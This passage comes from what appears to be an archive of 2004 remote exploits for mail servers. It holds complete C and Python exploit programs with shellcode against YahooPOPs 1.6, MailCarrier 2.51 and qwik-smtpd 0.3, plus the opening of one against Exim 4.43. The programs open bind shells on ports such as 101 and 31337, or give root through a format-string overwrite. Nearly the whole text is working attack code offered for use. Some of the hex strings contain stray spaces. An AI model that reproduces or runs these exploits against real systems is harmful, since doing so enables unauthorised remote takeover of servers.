if (!strstr(recvbuf,"220 YahooPOPs")){cout<<"[+] this is not a YahooPOPS server, quitting..."<<endl;return -1;}
cout<<"[+] YahooPOPS SMTP detected, constructing the payload"<<endl;
size=508-sizeof(scode);
memset(payload,0,sizeof(payload));
for (x=0;x<size;x++){strcat(payload,"\x90");}
strcat(payload,scode);strcat(payload,jmp);strcat(p ayload,jmpebx);
if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
return 0;
}
}
closesocket(s);
WSACleanup();
return 0;
}
void usage(char* us)
{
cout<<"USAGE: 101_ypops.exe ip port\n"<<endl;
cout<<"NOTE: The port should be the SMTP, not POP3!"<<endl;
cout<<" The port 25 is default if no port specified."<<endl;
cout<<" The exploit bind a shellcode to the port 101."<<endl;
return;
}
void ver()
{
cout<<endl;
cout<<" "<<endl;
cout<<" ================================================== =[v0.1]==="<<endl;
cout<<" ===YahooPOPS <= v1.6, SMTP Remote Buffer Overflow Exploit==="<<endl;
cout<<" =====coded by class101===========[DFind.kd-team.com 2004]==="<<endl;
cout<<" ================================================== =========="<<endl;
cout<<" "<<endl;
}
// [2004-10-15]
25 YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit
//Diabolic Crab's exploit for YahooPOPs <= 1.6 SMTP
//[email protected]
//www.hackerscenter.com
//For more work check out, http://icis.digitalparadox.org
//This was done at 4 am so escuse the messy code if any
//Good job class101 on the windows version ;)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>
char scode[] = //Bind shell on port 101, taken from the windows exploit by class101
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
static char payload[1024];
char jmp[]="\x23\x9b\x02\x10"; //JMP ESP
char jmpebx[]="\xff\xe3"; //JMP EBX
void usage(char* us);
void ver();
int main(int argc, char *argv[])
{
ver();
char grab[999];
int sock;
if (argc<4){
usage(argv[0]);return -1;
}
int ip=htonl(inet_addr(argv[1])), port, size, x;
if (argc==3){port=atoi(argv[2]);}
else port=25;
struct hostent *aap;
struct sockaddr_in addr;
if((aap=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("Gethostbyname()");
exit(1); }
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("Socket()");
exit(1); }
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
memcpy((char *)&addr.sin_addr,(char *)aap->h_addr,aap->h_length);
if(connect(sock,(struct sockaddr *)&addr,sizeof(addr))!=0) {
perror("Connect()");
exit(0); }
printf ("[+] Connected\n");
fflush(stdin);
sleep(2);
read(sock,grab,200);
printf ("[+] Reading Banner\n");
if (!strstr(grab,"220 YahooPOPs")) {
printf("[+] this is not a YahooPOPS server, quitting...\n");
return -1; }
printf ("[+] Found YahooPOP's Server\n");
size=508-sizeof(scode);
memset(payload,0,sizeof(payload));
for (x=0;x<size;x++){strcat(payload,"\x90");}
strcat(payload,scode);strcat(payload,jmp);strcat(p ayload,jmpebx);
printf ("[+] Sending Shellcode\n");
if (send(sock, payload, strlen(payload), 0) < 0) {
perror("Send()");
exit(0); }
printf ("[+] Sleep for 3 seconds\n");
sleep(3);
char hack[100];
sprintf (hack, "telnet %s 101", argv[1]);
system (hack);
return 0;
}
void usage(char* us)
{
printf("Usage: ./dc_ypop ip port\n");
printf("The exploit binds a shell to the port 101.\n");
return;
}
void ver()
{
printf ("################################################## ##############\n");
printf ("# Diabolic Crab's Bind Shell Exploit for YahooPOPS <= 1.6 SMTP #\n");
printf ("# [email protected] www.hackerscenter.com #\n");
printf ("# Credits to Behrang Fouladi for finding this bug #\n");
printf ("################################################## ##############\n");
}
// [2004-10-18]
25 MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Exploit
################################################## #######
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 23 Oct 2004 - muts #
################################################## #######
# D:\BO>mailcarrier-2.5-EHLO.py #
################################################## #######
# D:\data\tools>nc -v 192.168.1.32 101 #
# localhost [127.0.0.1] 101 (hostname) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\WINNT\system32> #
################################################## #######
import struct
import socket
print "\n\n############################################## #"
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n"
print "\n\n############################################## #"
def make_overflow_dummy(overflow_len, retaddr):
return 'A' * overflow_len + struct.pack('<L', retaddr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"
# Change RET address as need be.
#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\x90' * 32 + sc2 # RET Win2000 SP4 ENG
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x90' * 32 + sc2 #RET WinXP SP2 ENG
try:
print "\nSending evil buffer..."
s.connect(('127.0.0.1',25))
s.send('EHLO ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
print "\nDone! Try connecting to port 101 on victim machine."
except:
print "Could not connect to SMTP!"
# [2004-10-26]
25 Qwik SMTP 0.3 Remote Root Format String Exploit
/*
** qwik-smtp Remote Root Exploit
** -------------------------------
**
** Bug found by: Dark Eagle <darkeagle [at] list d0t ru>
** Exploit coded by: Carlos Barros <barros [at] barrossecurity d0t com>
** Home Page: http://www.barrossecurity.com
**
** Exploitation techinique:
**
** This bug is a simple format string bug. While coding this exploit, I found just two
** "problems". The first is that our buffer is only 32 bytes long and the second is that
** qwik-smtpd filters spaces chars with the isspace(), this way our 0x0b code used in the
** shellcode is filtered. To circumvent the first problem I divided the exploit in two
** stages. The first one overwrite the LSW of the exit() GOT entry and the second overwrite
** the MSW. Then, we send an EXIT command forcing the qwik-smtpd to jump into our shellcode.
** The second problem was "fixed" using another char (0x10) and then decrementing it before
** calling the int 0x80 syscall.
**
** Notes:
**
** You MUST enter your external IP Address (when attacking remotely) or 127.0.0.1 (when
** attacking locally) cause its IP is printed before our buffer, so its length MUST enter
** in the calculation of the format string attack.
**
** sprintf(Received,"Received: from %s (HELO %s) (%s) by %s with SMTP; %s\n",
** clientHost, clientHelo, clientIP, localHost, timebuf);
** ----------
** Destination MUST be one valid email address on the target machine. If not, it will reply
** with one erro code like this:
**
** -> Sending RCPT TO ... ERROR - 550 user not here
**
** Screenshot:
**
** [barros@BarrosSecurity qwik]$ ./a.out -h localhost -u [email protected] -t 0 -i 127.0.0.1
**
** ==[ qwik_smtpd Remote Format String Exploit, bY Carlos Barros ]==
**
** *** Target plataform : qwik_smtpd 0.3 - Fedor Core 2
** *** Target host : localhost
** *** Target port : 25
** *** Target GOT : 0x0804b2e8
**
** *** Target Retaddr : 0xfeffe6f0
**
** -> Connecting ... OK
** -> Getting the banner ... 220 SMTP service ready
**
** *** STAGE 1 ***
**
** -> Creating EvilBuffer ... OK
** -> Sending HELO with EvilBuffer ... OK
** -> Sending MAIL FROM with Shellcode ... OK
** -> Sending RCPT TO ... OK
** -> Sending DATA ... OK
** -> Sending "." ... OK
**
** *** STAGE 2 ***
**
** -> Creating EvilBuffer ... OK
** -> Sending HELO with EvilBuffer ... OK
** -> Sending MAIL FROM with Shellcode ... OK
** -> Sending RCPT TO ... OK
** -> Sending DATA ... OK
** -> Sending "." ... OK
** -> Attacking ... OK
**
** Try to send some commands. If doesn't work, hit CTRL+C to exit
**
** Linux BarrosSecurity 2.6.8-1.521 #1 Mon Aug 16 09:01:18 EDT 2004 i686 i686 i386 GNU/Linux
** uid=0(root) gid=0(root)
** exit
** [barros@BarrosSecurity qwik]$
*/
#include <getopt.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
/*--< Prototypes >--*/
void Usage(char *);
void fatal(char *);
int ConectToHost(char *,int);
char *CreateEvilBuffer(int,int);
void doHack(int);
void VerifyLastCommand(int, char *, char *);
void SendBufferAndVerify(int , char *, char *, char *);
/*--< Defines >--*/
#define DEFAULT_PORT 25
#define STDIN 0
#define STDOUT 1
#define MAX_BUFFER 1024
#define NOPSIZE 200
#define NOP 0x90
#define BUFFER_OFFSET "567" // Keep these \"
#define PADDING "." //
struct
{
char *Name;
int Gotaddr;
int Retaddr;
}Targets[] =
{
"qwik_smtpd 0.3 - Fedor Core 2",
0x0804b2e8,
0xfeffe6f0,
// Finish
0,
0,
0
};
// Shellcode by The Itch of Netric (www.netric.org)
char Shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0); */
"\x31\xc0\x50\x68\x6e\x2f\x73\x68" /* execve() of /bins/h */
"\x68\x2f\x2f\x62\x69\x89\xe3\x50"
"\x53\x89\xe1\xb0"
"\x10\x48\x48\x48\x48\x48" // Modified by Carlos Barros to skip isspace()
"\xcd\x80";
unsigned char STAGE=1;
int IP_Len = 0;
int main(int argc, char **argv)
{
extern char *optarg;
extern int optind;
char opt;
char *Host = NULL;
int Port = DEFAULT_PORT;
int TargetNumber = 0;
int Sock,i;
char *EvilBuffer;
char Buffer[MAX_BUFFER];
char *Rcpt_TO;
char Mail_From[NOPSIZE+strlen(Shellcode)+20];
int ttt;
fprintf(stdout,"\n==[ qwik_smtpd Remote Format String Exploit, bY Carlos Barros ]==\n\n");
// Process arguments
while ( (opt = getopt(argc,argv,"i:h:t:p:u:")) != EOF)
{
switch(opt)
{
case 'i':
IP_Len = strlen(optarg);
break;
case 'u':
Rcpt_TO = optarg;
break;
case 'p':
Port = atoi(optarg);
if(!Port) Usage(argv[0]);
break;
case 't':
TargetNumber = atoi(optarg);
break;
case 'h':
Host = optarg;
break;
default: Usage(argv[0]);
break;
}
}
if(Host == NULL || Rcpt_TO == NULL || !IP_Len) Usage(argv[0]);
// Verify target
for(i=0;;i++)
if(Targets[i].Name == 0) break;
if(--i<TargetNumber) Usage(argv[0]);
fprintf(stdout,"*** Target plataform : %s\n",Targets[TargetNumber].Name);
fprintf(stdout,"*** Target host : %s\n",Host);
fprintf(stdout,"*** Target port : %u\n",Port);
fprintf(stdout,"*** Target GOT : %#010x\n\n",Targets[TargetNumber].Gotaddr);
fprintf(stdout,"*** Target Retaddr : %#010x\n\n",Targets[TargetNumber].Retaddr);
fprintf(stdout,"-> Connecting ... ");
fflush(stdout);
Sock = ConectToHost(Host,Port);
if(Sock == -1) fatal("Could not connect");
else fprintf(stdout,"OK\n");
fprintf(stdout,"-> Getting the banner ... ");
fflush(stdout);
if(recv(Sock,Buffer,MAX_BUFFER-1,0) != -1)
fprintf(stdout,"%s",Buffer);
else
fatal("RECV");
for(;STAGE<3;STAGE++)
{
fprintf(stdout,"\n*** STAGE %d ***\n\n",STAGE);
fprintf(stdout,"-> Creating EvilBuffer ... ");
fflush(stdout);
EvilBuffer = CreateEvilBuffer(Targets[TargetNumber].Gotaddr,Targets[TargetNumber].Retaddr);
fprintf(stdout,"OK\n");
fprintf(stdout,"-> Sending HELO with EvilBuffer ... ");
fflush(stdout);
SendBufferAndVerify(Sock,EvilBuffer,"250",0);
free(EvilBuffer);
fprintf(stdout,"-> Sending MAIL FROM with Shellcode ... ");
fflush(stdout);
// Create the string MAIL FROM NOP+SHELLCODE
strcpy(Mail_From,"mail from ");
memset(Mail_From+10,NOP,NOPSIZE);
Mail_From[10+NOPSIZE-1] = 0;
strcat(Mail_From,Shellcode);
strcat(Mail_From,"\n");
SendBufferAndVerify(Sock,Mail_From,"250",0);
fprintf(stdout,"-> Sending RCPT TO ... ");
fflush(stdout);
snprintf(Buffer,MAX_BUFFER,"rcpt to %s\n",Rcpt_TO);
SendBufferAndVerify(Sock,Buffer,"250","251");
fprintf(stdout,"-> Sending DATA ... ");
fflush(stdout);
sprintf(Buffer,"data\n");
SendBufferAndVerify(Sock,Buffer,"354",0);
fprintf(stdout,"-> Sending \".\" ... ");
fflush(stdout);
snprintf(Buffer,MAX_BUFFER,".\n");
SendBufferAndVerify(Sock,Buffer,"250",0);
}
fprintf(stdout,"-> Attacking ... ");
sprintf(Buffer,"quit\n");
SendBufferAndVerify(Sock,Buffer,"221",0);
fprintf(stdout,"\nTry to send some commands. If doesn't work, hit CTRL+C to exit\n\n");
doHack(Sock);
close(Sock);
}
void SendBufferAndVerify(int Sock, char *Buffer, char *Code1, char *Code2)
{
if(send(Sock,Buffer,strlen(Buffer),0) == -1)
fatal("SEND");
VerifyLastCommand(Sock,Code1,Code2);
}
void VerifyLastCommand(int Sock, char *Code1, char *Code2)
{
char Buffer[MAX_BUFFER];
if(recv(Sock,Buffer,MAX_BUFFER-1,0) != -1)
{
if(strstr(Buffer,Code1) || (Code2 && strstr(Buffer,Code2) )) fprintf(stdout,"OK\n",Buffer);
else
{
*strstr(Buffer,"\n") = 0;
fatal(Buffer);
}
}
else
fatal("RECV");
}
void Usage(char *Prog)
{
int i;
fprintf(stderr, "Usage: %s -h hostname <options>\n\n"
"Options:\n\n"
" -i ipaddress : Your IP address\n"
" -u rcpt_to : Select one valid destination\n"
" -t target : Select the target\n"
" -p portnumber : Sets a new port number <default: 25>\n\n"
"Targets:\n\n",Prog);
for(i=0;;i++)
{
if(Targets[i].Name != 0)
fprintf(stderr," [%u] %s\n",i,Targets[i].Name);
else
break;
}
fprintf(stderr,"\n");
exit(1);
}
void fatal(char *ErrorMsg)
{
fprintf(stderr,"ERROR - %s\n\n",ErrorMsg);
exit(1);
}
int ConectToHost(char *Host,int Port)
{
struct sockaddr_in server;
struct hostent *hp;
int s;
server.sin_family = AF_INET;
hp = gethostbyname(Host);
if(!hp) return(-1);
memcpy(&server.sin_addr,hp->h_addr,hp->h_length);
server.sin_port = htons(Port);
s = socket(PF_INET,SOCK_STREAM,0);
if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0)
return(-1);
return(s);
}
char *CreateEvilBuffer(int GOT, int Retaddr)
{
char *Buffer = malloc(500);
if(STAGE==1)
sprintf(Buffer,
"helo "PADDING
"%c%c%c%c" // GOT ADDR
"%%%ud" // LSW(EGGAddr)
"%%"BUFFER_OFFSET"$hn" // Write
"\n",
((u_long)GOT),
((u_long)GOT >> 8),
((u_long)GOT >> 16),
((u_long)GOT >> 24),
((Retaddr & 0x0000FFFF) - (27+IP_Len))
);
else
sprintf(Buffer,
"helo "PADDING
"%c%c%c%c" // GOT ADDR
"%%%ud" // LSW(EGGAddr)
"%%"BUFFER_OFFSET"$hn" // Write
"\n",
((u_long)GOT+2),
(((u_long)GOT+2) >> 8),
(((u_long)GOT+2) >> 16),
(((u_long)GOT+2) >> 24),
(((Retaddr & 0xFFFF0000)>>16) - (27+IP_Len))
);
return Buffer;
}
void doHack(int Sock)
{
char buffer[1024 * 10];
int count;
fd_set readfs;
write(Sock,"uname -a;id\n",12);
while(1)
{
FD_ZERO(&readfs);
FD_SET(STDIN, &readfs);
FD_SET(Sock, &readfs);
if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0)
{
if(FD_ISSET(STDIN, &readfs))
{
if((count = read(STDIN, buffer, 1024)) <= 0)
{
if(errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else
{
close(Sock);
exit(-1);
}
}
write(Sock, buffer, count);
}
if(FD_ISSET(Sock, &readfs))
{
if((count = read(Sock, buffer, 1024)) <= 0)
{
if(errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else
{
close(Sock);
exit(-1);
}
}
write(STDOUT, buffer, count);
}
}
}
}
// [2004-11-09]
25 MailCarrier 2.51 Remote Buffer Overflow Exploit
/* Remote exploit for MailCarrier by NoPh0BiA,
no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**
[x] Connected to: 192.168.0.1 PORT: 25
[x] Sending evil buffer..done.
[x] Trying to connect to port 31337..
[x] Connected to: 192.168.0.1 PORT: 31337
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greets to NtWaK0,schap,kane,kamalo,foufs :P
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#define PORT 25
#define RPORT 31337
#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x4d\x81"
"\x59\x47\x83\xeb\xfc\xe2\xf4\xb1\x69\x0f\x47\x4d\x 81\x0a\x12\x1b"
"\xd6\xd2\x2b\x69\x99\xd2\x02\x71\x0a\x0d\x42\x35\x 80\xb3\xcc\x07"
"\x99\xd2\x1d\x6d\x80\xb2\xa4\x7f\xc8\xd2\x73\xc6\x 80\xb7\x76\xb2"
"\x7d\x68\x87\xe1\xb9\xb9\x33\x4a\x40\x96\x4a\x4c\x 46\xb2\xb5\x76"
"\xfd\x7d\x53\x38\x60\xd2\x1d\x69\x80\xb2\x21\xc6\x 8d\x12\xcc\x17"
"\x9d\x58\xac\xc6\x85\xd2\x46\xa5\x6a\x5b\x76\x8d\x de\x07\x1a\x16"
"\x43\x51\x47\x13\xeb\x69\x1e\x29\x0a\x40\xcc\x16\x 8d\xd2\x1c\x51"
"\x0a\x42\xcc\x16\x89\x0a\x2f\xc3\xcf\x57\xab\xb2\x 57\xd0\x80\xcc"
"\x6d\x59\x46\x4d\x81\x0e\x11\x1e\x08\xbc\xaf\x6a\x 81\x59\x47\xdd"
"\x80\x59\x47\xfb\x98\x41\xa0\xe9\x98\x29\xae\xa8\x c8\xdf\x0e\xe9"
"\x9b\x29\x80\xe9\x2c\x77\xae\x94\x88\xac\xea\x86\x 6c\xa5\x7c\x1a"
"\xd2\x6b\x18\x7e\xb3\x59\x1c\xc0\xca\x79\x16\xb2\x 56\xd0\x98\xc4"
"\x42\xd4\x32\x59\xeb\x5e\x1e\x1c\xd2\xa6\x73\xc2\x 7e\x0c\x43\x14"
"\x08\x5d\xc9\xaf\x73\x72\x60\x19\x7e\x6e\xb8\x18\x b1\x68\x87\x1d"
"\xd1\x09\x17\x0d\xd1\x19\x17\xb2\xd4\x75\xce\x8a\x b0\x82\x14\x1e"
"\xe9\x5b\x47\x37\xe8\xd0\xa7\x27\x91\x09\x10\xb2\x d4\x7d\x14\x1a"
"\x7e\x0c\x6f\x1e\xd5\x0e\xb8\x18\xa1\xd0\x80\x25\x c2\x14\x03\x4d"
"\x08\xba\xc0\xb7\xb0\x99\xca\x31\xa5\xf5\x2d\x58\x d8\xaa\xec\xca"
"\x7b\xda\xab\x19\x47\x1d\x63\x5d\xc5\x3f\x80\x09\x a5\x65\x46\x4c"
"\x08\x25\x63\x05\x08\x25\x63\x01\x08\x25\x63\x1d\x 0c\x1d\x63\x5d"
"\xd5\x09\x16\x1c\xd0\x18\x16\x04\xd0\x08\x14\x1c\x 7e\x2c\x47\x25"
"\xf3\xa7\xf4\x5b\x7e\x0c\x43\xb2\x51\xd0\xa1\xb2\x f4\x59\x2f\xe0"
"\x58\x5c\x89\xb2\xd4\x5d\xce\x8e\xeb\xa6\xb8\x7b\x 7e\x8a\xb8\x38"
"\x81\x31\xb7\xc7\x85\x06\xb8\x18\x85\x68\x9c\x1e\x 7e\x89\x47";
struct sockaddr_in hrm,lar;
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
int conn(char *ip,int port)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(port);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr *)&hrm,sizeof(struct sockaddr))) < 0)
{
perror("connect");
exit(0);
}
printf("[x] Connected to: %s PORT: %d\n",ip,port);
return sockfd;
}
int main(int argc, char *argv[])
{
char *buffer = malloc(5530),*crap = malloc(32),*t;
int x,y;
if(argc<2)
{
printf("Usage: TargetIP.\n");
exit(0);
}
printf("**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**\n");
t=argv[1];
memset(buffer,'\0',5530);
memset(crap,0x41,32);
memset(buffer,0x90,5095);
strcat(buffer,RET);
strcat(buffer,crap);
strcat(buffer,shellcode);
x = conn(t,PORT);
printf("[x] Sending evil buffer..");
sleep(3);
write(x,"EHLO ",5);
sleep(1);
write(x,buffer,5530);
write(x,"\r\n\r\n",4);
sleep(2);
close(x);
printf("done.\n");
printf("[x] Trying to connect to port 31337..\n");
y = conn(t,RPORT);
printf("[x] 0wn3d!\n");
printf("\r\n");
shell(y);
}
// [2004-11-16]
25 Exim <= 4.43 auth_spa_server() Remote PoC Exploit
/* ecl-eximspa.c
* Yuri Gushin <[email protected]>
*
* Howdy :)
* This is pretty straightforward, an exploit for the recently
* discovered vulnerability in Exim's (all versions prior to and
* including 4.43) SPA authentication code - spa_base64_to_bits()
* will overflow a fixed-size buffer since there's no decent
* boundary checks before it in auth_spa_server()
*
* Greets fly out to the ECL crew, Alex Behar, Valentin Slavov
* blexim, manevski, elius, shrink, and everyone else who got left
* out :D
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <err.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <arpa/inet.h>
#define SC_PORT 13370
#define NOP 0xfd
struct {
char *name;
int retaddr;
} targets[] = {
{ "Bruteforce", 0xbfffffff },
{ "Debian Sarge exim4-daemon-heavy_4.34-9", 0xbfffed00 },
};
char sc[] = // thank you metasploit, skape, vlad902
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96"
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
struct {
struct sockaddr_in host;
int target;
int offset;
u_short wait;
} options;
static int brutemode;
int connect_port(u_short port);
void init_SPA(int sock);
void exploit(int sock, int address);
void shell(int sock);
void spa_bits_to_base64 (unsigned char *out, const unsigned char *in, int inlen);
void parse_options(int argc, char **argv);
void usage(char *cmd);
void banner(void);
int main(int argc, char **argv)
{
int address, sock_smtp, sock_shell;
banner();
parse_options(argc, argv);
address = targets[options.target].retaddr - options.offset;
brutemode = 0;
bruteforce:
if (!brutemode)
{
